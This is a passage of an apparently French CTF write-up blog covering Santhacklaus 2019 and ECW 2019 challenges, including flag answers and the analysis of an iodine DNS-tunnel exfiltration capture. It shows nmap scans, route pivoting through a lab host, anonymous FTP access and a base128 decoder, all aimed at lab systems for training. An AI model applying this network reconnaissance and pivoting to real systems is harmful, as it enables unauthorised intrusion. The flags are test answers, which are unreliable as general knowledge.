<span class="m">57</span>:~qSSANSSSSSANTASSSSASS2SANT@SANTSI7SANtS^SA<SSANzSSANMMSANySSM<span class="nv">$SANTASASXSS</span><span class="s1">'_?SANSAN:FSSSANSA{}SSSSSANTSYbSASASASA8US?'</span>eNSSAySrSSATSA<span class="s2">"SASVSANTSANSWSTSAeS.SFSAN,SA8SSAGJS5SASuA4S_SSSSANTXSSSSANTA{grep_is_pretty_US3f(..)l}<SSjSANSSSATSASSASASSJSSAitSA1cSSSANTSSANTSSSSANKASASAS{}t!SSANTSA)S!SA SANSSSAN9jrZ?rSANSSSSSSSSSAS^SSASANTASANSASqSANSASSSANSSJYS1SuSAS```</span>
</code></pre></div>
<p>Et le flag vient à nous :). 50 points supplémentaires.</p>Santhacklaus 2019 - Ho Ho Ho2019-12-24T00:00:00+01:002019-12-24T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-12-24:/santhacklaus-2019-ho-ho-ho.html<div class="highlight"><pre><span></span><code>Ho ho ho ! Welcome to the Santhacklaus CTF v2. We hope you'll like this edition :) In the mean time, why don't you flag this welcome challenge ?
The flag has two parts. First part is on our Twitter channel. Second part is in our Discord server. Expect something in …</code></pre></div><div class="highlight"><pre><span></span><code>Ho ho ho ! Welcome to the Santhacklaus CTF v2. We hope you'll like this edition :) In the mean time, why don't you flag this welcome challenge ?
The flag has two parts. First part is on our Twitter channel. Second part is in our Discord server. Expect something in l33tspeak. Flag is SANTA{sha256(concat(part1, part2))}
Exemple with part1=hello_ and part2=friend, flag would be SANTA{sha256(hello_friend)} = SANTA{db51...c331}
</code></pre></div>
<p>Il faut donc retrouver les deux parties du flag sur le Discord de l'équipe et le compte Twitter.</p>
<p>Le plus facile vu le compte Twitter. On descend dans le fil des Tweets et on trouve ce Tweet : https://twitter.com/santhacklaus/status/1192024086073008128</p>
<p><img alt="hohoho1" src="https://blog.nlegall.fr/images/santhacklaus/hohoho1.png"></p>
<p>Nous voilà donc en possession du première flag :D. On part à la recherche de sa moitié :).</p>
<p>En regardant la fenêtre, je trouve d'abord un pseudo en l33t.</p>
<p><img alt="hohoho1" src="https://blog.nlegall.fr/images/santhacklaus/hohoho2.png"></p>
<p>Je me dis que ça doit faire parti du Flag et ça fait un mot avec du sens en plus : <code>M3rryChR1stm4SCh3n4p4N</code>.</p>
<p>Mais échec :(. On reprends les recherches non sans mal. Désespéré après avoir tout rien trouver, on reprend chan par chan et on regarde l'ensemble de la fenêtre Discord. Et on trouve le flag dans l'en-tête. Vous savez, l'endroit que presque personne ne regarde...</p>
<p>On ajoute nos deux partis et on en fait un sha256 :</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">printf</span> <span class="s2">"M3rryChR1stm4SYouF1LTHY4nimaL5"</span> <span class="p">|</span> sha256sum <span class="p">|</span> sed -E <span class="s1">'s/^(.)/SANTA{\1/'</span> <span class="p">|</span> sed -E <span class="s1">'s/ -/}/'</span>
SANTA<span class="o">{</span>47892182dc20d2eb48f8e53c665ec0e9c75c8b7fc8e466fc56fa2fcb700da999<span class="o">}</span>
</code></pre></div>
<p>Et c'est le flag :). Les premiers 25 points :D.</p>Santhacklaus 2019 - The Beginning2019-12-24T00:00:00+01:002019-12-24T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-12-24:/santhacklaus-2019-the-beginning.html<div class="highlight"><pre><span></span><code>A trip down memory lane...
Santhacklaus CTF was born in 2018. Raised by four proud dads, it became something more and has grown in many ways.
We need you to find the flag of the "Bonjour" challenge of the first edition. It is not in a SANTA{} format but in …</code></pre></div><div class="highlight"><pre><span></span><code>A trip down memory lane...
Santhacklaus CTF was born in 2018. Raised by four proud dads, it became something more and has grown in many ways.
We need you to find the flag of the "Bonjour" challenge of the first edition. It is not in a SANTA{} format but in IMTLD{}.
</code></pre></div>
<p>Une simple recherche internet nous permet de trouver les Write-ups de l'année dernière et donc, le flag de cette épreuve :</p>
<div class="highlight"><pre><span></span><code>IMTLD{BaguetteForXMAS}
</code></pre></div>
<p>Hop ! 25 points de plus :D.</p>ECW - At your service2019-11-22T00:00:00+01:002019-11-22T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-11-22:/ecw-at-your-service.html<div class="highlight"><pre><span></span><code><span class="n">At</span> <span class="n">your</span> <span class="n">service</span> (<span class="mi">150</span> <span class="n">points</span> + ???)
<span class="n">Our</span> <span class="n">internal</span> <span class="n">IT</span> <span class="n">team</span> <span class="k">has</span> <span class="n">developed</span> <span class="n">an</span> <span class="n">innovative</span> <span class="n">tool</span> <span class="nb">to</span> <span class="n">assist</span> <span class="n">users</span> <span class="nb">in</span> <span class="n">their</span> <span class="n">daily</span> <span class="n">tasks</span>.
<span class="n">This</span> <span class="n">tool</span> <span class="k">has</span> <span class="n">been</span> <span class="n">deployed</span> <span class="n">on</span> <span class="n">some</span> <span class="n">Windows</span> <span class="n">workstations</span> <span class="nb">last</span> <span class="n">months</span>, <span class="k">but</span> <span class="n">we</span> <span class="n">strongly</span> <span class="n">suspect</span> <span class="n">that</span> <span class="n">attackers</span> <span class="n">have</span> <span class="n">used</span> <span class="n">it</span> <span class="nb">to</span> <span class="n">gain</span> <span class="n">administrator</span> <span class="n">privileges</span> <span class="n">on</span> <span class="n">these</span> <span class="n">machines</span>.
<span class="n">The</span> <span class="n">service …</span></code></pre></div><div class="highlight"><pre><span></span><code><span class="n">At</span> <span class="n">your</span> <span class="n">service</span> (<span class="mi">150</span> <span class="n">points</span> + ???)
<span class="n">Our</span> <span class="n">internal</span> <span class="n">IT</span> <span class="n">team</span> <span class="k">has</span> <span class="n">developed</span> <span class="n">an</span> <span class="n">innovative</span> <span class="n">tool</span> <span class="nb">to</span> <span class="n">assist</span> <span class="n">users</span> <span class="nb">in</span> <span class="n">their</span> <span class="n">daily</span> <span class="n">tasks</span>.
<span class="n">This</span> <span class="n">tool</span> <span class="k">has</span> <span class="n">been</span> <span class="n">deployed</span> <span class="n">on</span> <span class="n">some</span> <span class="n">Windows</span> <span class="n">workstations</span> <span class="nb">last</span> <span class="n">months</span>, <span class="k">but</span> <span class="n">we</span> <span class="n">strongly</span> <span class="n">suspect</span> <span class="n">that</span> <span class="n">attackers</span> <span class="n">have</span> <span class="n">used</span> <span class="n">it</span> <span class="nb">to</span> <span class="n">gain</span> <span class="n">administrator</span> <span class="n">privileges</span> <span class="n">on</span> <span class="n">these</span> <span class="n">machines</span>.
<span class="n">The</span> <span class="n">service</span> <span class="k">is</span> <span class="n">installed</span> <span class="n">on</span> <span class="n">a</span> <span class="n">Windows</span> <span class="n">workstation</span> <span class="n">on</span> <span class="n">the</span> <span class="n">Administrative</span> <span class="n">Center</span> <span class="n">LAN</span> <span class="k">with</span> <span class="n">the</span> <span class="n">IP</span> <span class="n">address</span> <span class="mf">10.0.40.10</span>. <span class="n">You</span> <span class="nb">can</span> <span class="nb">connect</span> <span class="k">with</span> <span class="n">RDP</span> <span class="nb">to</span> <span class="n">this</span> <span class="n">machine</span> <span class="n">using</span> <span class="n">the</span> <span class="n">following</span> <span class="n">credentials:</span> <span class="n">user</span> / <span class="n">user</span>.
</code></pre></div>
<p>On se connecte en rdp sur le serveur avec les identifiants fournis. La description indique que c'est un service que nous cherchons. Nous pouvons donc ouvrirs la console des services :</p>
<div class="highlight"><pre><span></span><code><span class="err">services.msc</span>
</code></pre></div>
<p>On voit alors un service appelé Alfred (merci Batman :p) avec une belle desciption :</p>
<p><img alt="alfred.png" src="https://blog.nlegall.fr/images/ecw/alfred.png"></p>
<p>On a donc le premier flag de l'épreuve et les 25 points associés :).</p>ECW - Data exfiltration2019-11-22T00:00:00+01:002019-11-22T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-11-22:/ecw-data-exfiltration.html<p><em>File : <a href="https://blog.nlegall.fr/files/ecw/extracted.pcap">extracted.pcap</a></em></p>
<p><em>Merci à Killbit pour avoir trouver le writeup et les deux scripts python !</em></p>
<div class="highlight"><pre><span></span><code><span class="k">Data</span> <span class="n">exfiltration</span> <span class="p">(</span><span class="mi">50</span> <span class="n">points</span><span class="p">)</span>
<span class="n">It</span> <span class="n">seems</span> <span class="n">that</span> <span class="k">some</span> <span class="k">sensitive</span> <span class="n">information</span> <span class="n">has</span> <span class="n">been</span> <span class="n">compromised</span><span class="p">.</span> <span class="n">The</span> <span class="n">supervision</span> <span class="n">teams</span> <span class="n">have</span> <span class="n">captured</span> <span class="n">suspicious</span> <span class="n">traffic</span> <span class="k">and</span> <span class="n">stored</span> <span class="n">it</span> <span class="k">in</span> <span class="n">the</span> <span class="n">FTP</span> <span class="n">server</span> <span class="k">of</span> <span class="n">the</span> <span class="n">Harbour</span><span class="err">'</span><span class="n">s</span> <span class="n">Master</span> <span class="n">Office</span> <span class="n">Secure …</span></code></pre></div><p><em>File : <a href="https://blog.nlegall.fr/files/ecw/extracted.pcap">extracted.pcap</a></em></p>
<p><em>Merci à Killbit pour avoir trouver le writeup et les deux scripts python !</em></p>
<div class="highlight"><pre><span></span><code><span class="k">Data</span> <span class="n">exfiltration</span> <span class="p">(</span><span class="mi">50</span> <span class="n">points</span><span class="p">)</span>
<span class="n">It</span> <span class="n">seems</span> <span class="n">that</span> <span class="k">some</span> <span class="k">sensitive</span> <span class="n">information</span> <span class="n">has</span> <span class="n">been</span> <span class="n">compromised</span><span class="p">.</span> <span class="n">The</span> <span class="n">supervision</span> <span class="n">teams</span> <span class="n">have</span> <span class="n">captured</span> <span class="n">suspicious</span> <span class="n">traffic</span> <span class="k">and</span> <span class="n">stored</span> <span class="n">it</span> <span class="k">in</span> <span class="n">the</span> <span class="n">FTP</span> <span class="n">server</span> <span class="k">of</span> <span class="n">the</span> <span class="n">Harbour</span><span class="err">'</span><span class="n">s</span> <span class="n">Master</span> <span class="n">Office</span> <span class="n">Secure</span> <span class="p">(</span><span class="n">HMOS</span><span class="p">)</span> <span class="n">LAN</span><span class="p">,</span> <span class="n">but</span> <span class="k">do</span> <span class="k">not</span> <span class="n">succeed</span> <span class="k">to</span> <span class="k">analyze</span> <span class="n">it</span><span class="p">.</span>
<span class="n">Help</span> <span class="n">them</span><span class="p">.</span>
</code></pre></div>
<p>Première étape, récupération des fichiers. Direction le serveur FTP ! Il faut d'abord trouvé son IP. Nous savons qu'il se trouve dans le <code>HMOS (Harbour's Master Office Secure) LAN</code> mais aucune information sur celui-ci. Cependant, nous pouvons faire des essais ciblés. Il y au un réseau en <code>10.0.10.0/24</code> et <code>10.0.30.0/24</code> d'annoncés. Essayons donc le milieu : <code>10.0.20.0/24</code>.</p>
<p>Un scan NMAP ne renvoi rien car ce réseau ne semble pas être joignable.</p>
<p>Un scan de réseau sur le LAN nous indique un serveur en <code>10.0.10.254</code>.</p>
<div class="highlight"><pre><span></span><code><span class="err">Nmap scan report for 10.0.10.254</span>
<span class="err">Host is up (0.00067s latency).</span>
<span class="err">Not shown: 99 closed ports</span>
<span class="err">PORT STATE SERVICE</span>
<span class="err">22/tcp open ssh</span>
<span class="err">MAC Address: 2E:0A:45:6B:CB:7F (Unknown)</span>
</code></pre></div>
<p>On ajoute donc la route pour ce réseau via ce serveur : <code>ip r a 10.0.20.0/24 via 10.0.10.254 dev eth0</code>.</p>
<p>On peut donc refaire notre scan réseau :</p>
<div class="highlight"><pre><span></span><code><span class="n">Starting</span> <span class="n">Nmap</span> <span class="mi">7</span><span class="p">.</span><span class="mi">80</span> <span class="p">(</span> <span class="n">https</span><span class="p">:</span><span class="o">//</span><span class="n">nmap</span><span class="p">.</span><span class="n">org</span> <span class="p">)</span> <span class="k">at</span> <span class="mi">2019</span><span class="o">-</span><span class="mi">11</span><span class="o">-</span><span class="mi">21</span> <span class="mi">10</span><span class="p">:</span><span class="mi">15</span> <span class="n">EST</span>
<span class="n">Nmap</span> <span class="n">scan</span> <span class="n">report</span> <span class="k">for</span> <span class="mi">10</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">20</span><span class="p">.</span><span class="mi">1</span>
<span class="k">Host</span> <span class="k">is</span> <span class="n">up</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">00068</span><span class="n">s</span> <span class="n">latency</span><span class="p">).</span>
<span class="k">Not</span> <span class="n">shown</span><span class="p">:</span> <span class="mi">99</span> <span class="n">closed</span> <span class="n">ports</span>
<span class="n">PORT</span> <span class="k">STATE</span> <span class="n">SERVICE</span>
<span class="mi">22</span><span class="o">/</span><span class="n">tcp</span> <span class="k">open</span> <span class="n">ssh</span>
<span class="n">Nmap</span> <span class="n">scan</span> <span class="n">report</span> <span class="k">for</span> <span class="mi">10</span><span class="p">.</span><span class="mi">0</span><span class="p">.</span><span class="mi">20</span><span class="p">.</span><span class="mi">10</span>
<span class="k">Host</span> <span class="k">is</span> <span class="n">up</span> <span class="p">(</span><span class="mi">0</span><span class="p">.</span><span class="mi">0012</span><span class="n">s</span> <span class="n">latency</span><span class="p">).</span>
<span class="k">Not</span> <span class="n">shown</span><span class="p">:</span> <span class="mi">98</span> <span class="n">filtered</span> <span class="n">ports</span>
<span class="n">PORT</span> <span class="k">STATE</span> <span class="n">SERVICE</span>
<span class="mi">21</span><span class="o">/</span><span class="n">tcp</span> <span class="k">open</span> <span class="n">ftp</span>
<span class="mi">22</span><span class="o">/</span><span class="n">tcp</span> <span class="k">open</span> <span class="n">ssh</span>
<span class="n">Nmap</span> <span class="n">done</span><span class="p">:</span> <span class="mi">256</span> <span class="n">IP</span> <span class="n">addresses</span> <span class="p">(</span><span class="mi">2</span> <span class="n">hosts</span> <span class="n">up</span><span class="p">)</span> <span class="n">scanned</span> <span class="k">in</span> <span class="mi">13</span><span class="p">.</span><span class="mi">97</span> <span class="n">seconds</span>
</code></pre></div>
<p>Bingo ! On a notre serveur FPT. On lance la connexion avec FileZilla. Comme on n'a pas d'information sur l'utilisateur et le mot de passe, on tente sans rien...</p>
<p><img alt="ftp.png" src="https://blog.nlegall.fr/images/ecw/ftp.png"></p>
<p>Et aussi surprennent qu'il soit, ça marche. Merci le FTP... On aspire alors tout le contenu.</p>
<p>On a alors ces fichiers à disposition :</p>
<div class="highlight"><pre><span></span><code>├── Challenges
│ ├── Android
│ │ ├── base.apk
│ │ └── dump.pcap
│ └── Data exfiltration
│ ├── capture.pcap
├── Confidential patents
│ ├── <span class="m">2162819600219719</span>.jpg
│ ├── <span class="m">3479819471660548</span>.jpg
│ ├── <span class="m">3725111495999545</span>.jpg
│ ├── <span class="m">5240616991475271</span>.jpg
│ ├── <span class="m">5459753873408937</span>.jpg
│ ├── <span class="m">7729689642204675</span>.jpg
│ └── <span class="m">8905726261278207</span>.jpg
├── flag.txt
├── ftp.png
└── ship.txt
</code></pre></div>
<p>On a un flag.txt qui permet de récupérer quelques points :</p>
<div class="highlight"><pre><span></span><code>cat flag.txt
ECW<span class="o">{</span>acb2<span class="o">[</span>...<span class="o">]</span>3c56<span class="o">}</span>
</code></pre></div>
<p>Et notre fichier <code>capture.pcap</code> qui nous intéresse. On l'ouvre avec Wireshark. En le parcourant, on voit un certains nombres de requêtes DNS étranges :</p>
<p><img alt="dataexfiltration_2.png" src="https://blog.nlegall.fr/images/ecw/dataexfiltration_2.png"></p>
<p>Après un rapide recherche avec le contenu des requêtes, on trouve l'outil utilisé pour cette exfiltration : <a href="https://code.kryo.se/iodine/">iodine</a>.</p>
<p>Le but est donc de filtrer les requêtes à destination du domaine malicieux (<code>.to.badland.com</code>) et de déchiffrer l'échange.</p>
<p>En cherchant sur internet, on tombe sur un Writeup de Rawsec sur un challenge passé sur cette technologie : https://rawsec.ml/en/hxp-2017-write-ups.</p>
<p><em>Ils ne sont pas (encore) compatible Python3. Pensez donc à utiliser <code>python2</code> si vous avez des erreurs.</em></p>
<div class="highlight"><pre><span></span><code><span class="sd">"""</span>
<span class="sd">Horrible looking direct port of</span>
<span class="sd">https://github.com/yarrick/iodine/blob/master/src/base128.c</span>
<span class="sd">"""</span>
<span class="n">cb128</span> <span class="o">=</span> \
<span class="s2">"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"</span> \
<span class="s2">"</span><span class="se">\274\275\276\277</span><span class="s2">"</span> \
<span class="s2">"</span><span class="se">\300\301\302\303\304\305\306\307\310\311\312\313\314\315\316\317</span><span class="s2">"</span> \
<span class="s2">"</span><span class="se">\320\321\322\323\324\325\326\327\330\331\332\333\334\335\336\337</span><span class="s2">"</span> \
<span class="s2">"</span><span class="se">\340\341\342\343\344\345\346\347\350\351\352\353\354\355\356\357</span><span class="s2">"</span> \
<span class="s2">"</span><span class="se">\360\361\362\363\364\365\366\367\370\371\372\373\374\375</span><span class="s2">"</span>
<span class="n">rev128</span> <span class="o">=</span> <span class="p">{</span><span class="nb">ord</span><span class="p">(</span><span class="n">c</span><span class="p">):</span> <span class="n">i</span> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">c</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">cb128</span><span class="p">)}</span>
<span class="k">def</span> <span class="nf">b128encode</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
<span class="n">data</span> <span class="o">=</span> <span class="nb">map</span><span class="p">(</span><span class="nb">ord</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span>
<span class="n">size</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="n">iin</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">buf</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">while</span> <span class="mi">1</span><span class="p">:</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">>=</span> <span class="n">size</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">cb128</span><span class="p">[((</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0xfe</span><span class="p">)</span> <span class="o">>></span> <span class="mi">1</span><span class="p">)]</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">>=</span> <span class="n">size</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">cb128</span><span class="p">[((</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0x01</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">6</span><span class="p">)</span> <span class="o">|</span> <span class="p">(((</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0xfc</span><span class="p">)</span> <span class="o">>></span> <span class="mi">2</span><span class="p">)</span> <span class="k">if</span> <span class="p">(</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span> <span class="o"><</span> <span class="n">size</span><span class="p">)</span> <span class="k">else</span> <span class="mi">0</span><span class="p">)]</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">>=</span> <span class="n">size</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">cb128</span><span class="p">[((</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0x03</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">5</span><span class="p">)</span> <span class="o">|</span> <span class="p">(((</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0xf8</span><span class="p">)</span> <span class="o">>></span> <span class="mi">3</span><span class="p">)</span> <span class="k">if</span> <span class="p">(</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span> <span class="o"><</span> <span class="n">size</span><span class="p">)</span> <span class="k">else</span> <span class="mi">0</span><span class="p">)]</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">>=</span> <span class="n">size</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">cb128</span><span class="p">[((</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0x07</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">4</span><span class="p">)</span> <span class="o">|</span> <span class="p">(((</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0xf0</span><span class="p">)</span> <span class="o">>></span> <span class="mi">4</span><span class="p">)</span> <span class="k">if</span> <span class="p">(</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span> <span class="o"><</span> <span class="n">size</span><span class="p">)</span> <span class="k">else</span> <span class="mi">0</span><span class="p">)]</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">>=</span> <span class="n">size</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">cb128</span><span class="p">[((</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0x0f</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">3</span><span class="p">)</span> <span class="o">|</span> <span class="p">(((</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0xe0</span><span class="p">)</span> <span class="o">>></span> <span class="mi">5</span><span class="p">)</span> <span class="k">if</span> <span class="p">(</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span> <span class="o"><</span> <span class="n">size</span><span class="p">)</span> <span class="k">else</span> <span class="mi">0</span><span class="p">)]</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">>=</span> <span class="n">size</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">cb128</span><span class="p">[((</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0x1f</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">2</span><span class="p">)</span> <span class="o">|</span> <span class="p">(((</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0xc0</span><span class="p">)</span> <span class="o">>></span> <span class="mi">6</span><span class="p">)</span> <span class="k">if</span> <span class="p">(</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span> <span class="o"><</span> <span class="n">size</span><span class="p">)</span> <span class="k">else</span> <span class="mi">0</span><span class="p">)]</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">>=</span> <span class="n">size</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">cb128</span><span class="p">[((</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0x3f</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">1</span><span class="p">)</span> <span class="o">|</span> <span class="p">(((</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0x80</span><span class="p">)</span> <span class="o">>></span> <span class="mi">7</span><span class="p">)</span> <span class="k">if</span> <span class="p">(</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span> <span class="o"><</span> <span class="n">size</span><span class="p">)</span> <span class="k">else</span> <span class="mi">0</span><span class="p">)]</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">>=</span> <span class="n">size</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="n">cb128</span><span class="p">[(</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">&</span> <span class="mh">0x7f</span><span class="p">)]</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">return</span> <span class="n">buf</span>
<span class="k">def</span> <span class="nf">b128decode</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
<span class="n">data</span> <span class="o">=</span> <span class="nb">map</span><span class="p">(</span><span class="nb">ord</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span>
<span class="n">size</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="n">iin</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">buf</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">while</span> <span class="mi">1</span><span class="p">:</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">>=</span> <span class="n">size</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(((</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">1</span><span class="p">)</span> <span class="o">|</span> <span class="p">((</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x40</span><span class="p">)</span> <span class="o">>></span> <span class="mi">6</span><span class="p">))</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">>=</span> <span class="n">size</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(((</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x3f</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">2</span><span class="p">)</span> <span class="o">|</span> <span class="p">((</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x60</span><span class="p">)</span> <span class="o">>></span> <span class="mi">5</span><span class="p">))</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">>=</span> <span class="n">size</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(((</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x1f</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">3</span><span class="p">)</span> <span class="o">|</span> <span class="p">((</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x70</span><span class="p">)</span> <span class="o">>></span> <span class="mi">4</span><span class="p">))</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">>=</span> <span class="n">size</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">or</span> <span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">buf</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(((</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x0f</span><span class="p">)</span> <span class="o"><<</span> <span class="mi">4</span><span class="p">)</span> <span class="o">|</span> <span class="p">((</span><span class="n">rev128</span><span class="p">[</span><span class="n">data</span><span class="p">[</span><span class="n">iin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]]</span> <span class="o">&</span> <span class="mh">0x78</span><span class="p">)</span> <span class="o">>></span> <span class="mi">3</span><span class="p">))</span>
<span class="n">iin</span> <span class="o">+=</span> <span class="mi">1</span>
